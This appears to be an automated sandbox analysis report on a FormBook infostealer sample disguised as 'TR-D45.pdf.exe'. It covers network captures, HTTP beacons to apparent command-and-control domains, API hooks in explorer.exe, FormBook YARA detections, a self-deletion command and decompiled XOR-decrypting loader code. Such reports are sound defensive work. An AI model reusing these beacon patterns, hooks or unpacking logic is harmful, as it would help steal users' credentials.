                                                      Nov 20, 2020 09:04:54.246778965 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246788025 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246799946 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246810913 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246823072 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246845007 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246849060 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246865988 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246877909 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246889114 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246901989 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246928930 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246989012 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:59.111391068 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:59.111422062 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:59.111500025 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:05:17.669693947 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:05:53.281797886 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.298346043 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.298507929 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.298646927 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.314970016 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.419409990 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.419733047 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.420752048 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.420877934 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.438633919 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:06:15.770123005 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.873212099 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.873437881 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.873560905 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.976099014 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976310968 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976324081 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976547003 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.976655006 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:16.079262972 CET804974554.147.194.143192.168.2.5

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 20, 2020 09:04:29.703107119 CET5959653192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:29.730174065 CET53595968.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:30.566425085 CET6529653192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:30.601692915 CET53652968.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:31.407577991 CET6318353192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:31.434827089 CET53631838.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:34.731328964 CET6015153192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:34.758527994 CET53601518.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:42.050661087 CET5696953192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:42.077615976 CET53569698.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:52.822020054 CET5516153192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:52.981875896 CET53551618.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:53.127981901 CET5475753192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:53.166579008 CET53547578.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:53.743817091 CET4999253192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:53.772696018 CET53499928.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:55.063994884 CET6007553192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:55.099390984 CET53600758.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:04:58.159496069 CET5501653192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:04:58.186534882 CET53550168.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:07.165672064 CET6434553192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:07.201189995 CET53643458.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:19.018973112 CET5712853192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:19.054299116 CET53571288.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:19.603241920 CET5479153192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:19.640173912 CET53547918.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:20.127237082 CET5046353192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:20.162691116 CET53504638.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:20.655438900 CET5039453192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:20.692374945 CET53503948.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:21.174978018 CET5853053192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:21.212754965 CET53585308.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:21.804411888 CET5381353192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:21.840164900 CET53538138.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:22.555119991 CET6373253192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:22.590714931 CET53637328.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:23.129868984 CET5734453192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:23.166244984 CET53573448.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:24.209369898 CET5445053192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:24.244648933 CET53544508.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:25.874269962 CET5926153192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:25.909646034 CET53592618.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:27.315752029 CET5715153192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:27.343394995 CET53571518.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:27.647795916 CET5941353192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:27.690709114 CET53594138.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:30.082146883 CET6051653192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:30.126589060 CET53605168.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:30.557787895 CET5164953192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:30.594754934 CET53516498.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:05:53.221961021 CET6508653192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:05:53.273062944 CET53650868.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:01.685451031 CET5643253192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:01.715022087 CET53564328.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:15.634852886 CET5292953192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:15.769042015 CET53529298.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:34.651122093 CET6431753192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:35.659728050 CET6431753192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:36.660382986 CET6431753192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:38.675417900 CET6431753192.168.2.58.8.8.8
                                                      Nov 20, 2020 09:06:39.683166027 CET53643178.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:40.687666893 CET53643178.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:41.688621044 CET53643178.8.8.8192.168.2.5
                                                      Nov 20, 2020 09:06:43.702752113 CET53643178.8.8.8192.168.2.5

                                                      ICMP Packets

                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Nov 20, 2020 09:06:40.687797070 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                                                      Nov 20, 2020 09:06:41.688704014 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                                                      Nov 20, 2020 09:06:43.702857018 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Nov 20, 2020 09:04:52.822020054 CET192.168.2.58.8.8.80x9015Standard query (0)pilatescollective.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:05:30.082146883 CET192.168.2.58.8.8.80xc22eStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:05:53.221961021 CET192.168.2.58.8.8.80x52e5Standard query (0)www.gcvinternational.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:15.634852886 CET192.168.2.58.8.8.80x5a49Standard query (0)www.celebrations.sucksA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:34.651122093 CET192.168.2.58.8.8.80xa44bStandard query (0)www.montreynaud.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:35.659728050 CET192.168.2.58.8.8.80xa44bStandard query (0)www.montreynaud.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:36.660382986 CET192.168.2.58.8.8.80xa44bStandard query (0)www.montreynaud.comA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:38.675417900 CET192.168.2.58.8.8.80xa44bStandard query (0)www.montreynaud.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Nov 20, 2020 09:04:52.981875896 CET8.8.8.8192.168.2.50x9015No error (0)pilatescollective.com192.185.152.65A (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:05:30.126589060 CET8.8.8.8192.168.2.50xc22eNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                      Nov 20, 2020 09:05:53.273062944 CET8.8.8.8192.168.2.50x52e5No error (0)www.gcvinternational.comgcvinternational.comCNAME (Canonical name)IN (0x0001)
                                                      Nov 20, 2020 09:05:53.273062944 CET8.8.8.8192.168.2.50x52e5No error (0)gcvinternational.com34.102.136.180A (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:15.769042015 CET8.8.8.8192.168.2.50x5a49No error (0)www.celebrations.sucks54.147.194.143A (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:39.683166027 CET8.8.8.8192.168.2.50xa44bServer failure (2)www.montreynaud.comnonenoneA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:40.687666893 CET8.8.8.8192.168.2.50xa44bServer failure (2)www.montreynaud.comnonenoneA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:41.688621044 CET8.8.8.8192.168.2.50xa44bServer failure (2)www.montreynaud.comnonenoneA (IP address)IN (0x0001)
                                                      Nov 20, 2020 09:06:43.702752113 CET8.8.8.8192.168.2.50xa44bServer failure (2)www.montreynaud.comnonenoneA (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.gcvinternational.com
                                                      • www.celebrations.sucks

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.54974334.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Nov 20, 2020 09:05:53.298646927 CET5388OUTGET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1
                                                      Host: www.gcvinternational.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 20, 2020 09:05:53.419409990 CET5389INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Fri, 20 Nov 2020 08:05:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "5fb6e13a-113"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.54974554.147.194.14380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Nov 20, 2020 09:06:15.873560905 CET5399OUTGET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1
                                                      Host: www.celebrations.sucks
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 20, 2020 09:06:15.976310968 CET5400INHTTP/1.1 301 Moved Permanently
                                                      Date: Fri, 20 Nov 2020 08:06:15 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Location: http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd
                                                      Content-Length: 428
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 65 6c 65 62 72 61 74 69 6f 6e 73 2e 73 75 63 6b 73 2f 67 6e 75 3f 58 32 4d 78 49 6a 4a 50 3d 63 6d 2f 76 5a 49 69 56 33 4f 73 30 71 39 6d 33 77 56 39 4e 41 59 6e 52 38 34 45 70 45 4b 32 57 2f 71 68 43 78 4a 4b 57 43 56 65 6b 31 31 6a 6e 4a 31 41 34 4d 49 4e 66 42 34 50 69 50 6a 35 43 58 67 68 45 26 61 6d 70 3b 62 6c 79 3d 54 56 49 70 63 7a 30 30 34 52 6b 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 65 6c 65 62 72 61 74 69 6f 6e 73 2e 73 75 63 6b 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&amp;bly=TVIpcz004Rkd">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.celebrations.sucks Port 80</address></body></html>


                                                      HTTPS Packets

                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                      Nov 20, 2020 09:04:53.319391966 CET192.185.152.65443192.168.2.549718CN=www.pilatescollective.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 06 01:22:43 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 04 01:22:43 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: user32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEB
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEB
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEB
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEB

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:09:04:34
                                                      Start date:20/11/2020
                                                      Path:C:\Users\user\Desktop\TR-D45.pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\TR-D45.pdf.exe'
                                                      Imagebase:0x400000
                                                      File size:86016 bytes
                                                      MD5 hash:937841064411662C36469498EA645660
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Reputation:low

                                                      General

                                                      Start time:09:04:42
                                                      Start date:20/11/2020
                                                      Path:C:\Users\user\Desktop\TR-D45.pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\TR-D45.pdf.exe'
                                                      Imagebase:0x400000
                                                      File size:86016 bytes
                                                      MD5 hash:937841064411662C36469498EA645660
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:09:04:57
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:
                                                      Imagebase:0x7ff693d90000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:05:11
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\SysWOW64\control.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                      Imagebase:0x180000
                                                      File size:114688 bytes
                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:09:05:15
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
                                                      Imagebase:0x150000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:05:16
                                                      Start date:20/11/2020
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7ecfc0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Executed Functions

                                                        C-Code - Quality: 37%
                                                        			E00404E8F(intOrPtr* __eax) {
                                                        
                                                        				asm("scasd");
                                                        				 *__eax =  *__eax + __eax;
                                                        			}



                                                        0x00404e8f
                                                        0x00404e90

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: +$F$O$p$s
                                                        • API String ID: 0-3113303454
                                                        • Opcode ID: 1518644961977e53607821391e2a65a4fbc1e3db837fe2d10f19e1dfdac99b1d
                                                        • Instruction ID: d6d0998c07ddfbd142f0e66ead69afd6dcc0861d38d611d1150af61f6f6422ba
                                                        • Opcode Fuzzy Hash: 1518644961977e53607821391e2a65a4fbc1e3db837fe2d10f19e1dfdac99b1d
                                                        • Instruction Fuzzy Hash: 8381DE6269A3810AFF350534C9F073E2A65EB57300F749DBBCA82DADD6C56EC5C08223
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E0040568E() {
                                                        				intOrPtr* _t8;
                                                        				intOrPtr* _t26;
                                                        				void* _t44;
                                                        				void* _t55;
                                                        				void* _t57;
                                                        				void* _t60;
                                                        				signed int _t63;
                                                        				void* _t72;
                                                        				void* _t74;
                                                        
                                                        				_t60 = (_t57 - 0x00000001 ^ 0x00000001) + 1;
                                                        				 *_t8 =  *_t8 + _t8;
                                                        				 *((intOrPtr*)(_t8 - 0x7cfe167d)) =  *((intOrPtr*)(_t8 - 0x7cfe167d)) + _t72;
                                                        				asm("stc");
                                                        				 *0x81 =  *0x81 + _t74;
                                                        				_t63 = _t60 + 2 ^ 0x00000001;
                                                        				do {
                                                        					0;
                                                        					_t63 = _t63 + 1;
                                                        				} while (1 != 0x536fd28);
                                                        				_t26 =  *((intOrPtr*)(0x40100c));
                                                        				do {
                                                        					_t26 = _t26 - 1;
                                                        				} while ( *_t26 != 0x2bb0d24);
                                                        				_t44 = VirtualAlloc(0, 0xf000, 0x4444, 0x13); // executed
                                                        				_t55 = 0xa3bc;
                                                        				do {
                                                        					 *_t5 =  *((intOrPtr*)(0x405a30 + _t55));
                                                        					 *(_t44 + _t55) =  *(_t44 + _t55) ^ 0xdd9a4ce4;
                                                        					_t55 = _t55 - 0x2c4 + 0x2c0;
                                                        				} while (_t55 >= 0);
                                                        				goto __eax;
                                                        			}












                                                        0x004056ac
                                                        0x004056b2
                                                        0x004056b4
                                                        0x004056ba
                                                        0x004056bb
                                                        0x004056d6
                                                        0x004056df
                                                        0x004056f0
                                                        0x00405746
                                                        0x00405750
                                                        0x004057c9
                                                        0x0040584b
                                                        0x00405853
                                                        0x0040585d
                                                        0x004059bc
                                                        0x004059d2
                                                        0x004059e6
                                                        0x004059f8
                                                        0x00405a01
                                                        0x00405a1e
                                                        0x00405a1e
                                                        0x00405a2c

                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,0000F000,-0000029E,-000000C3), ref: 004059BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
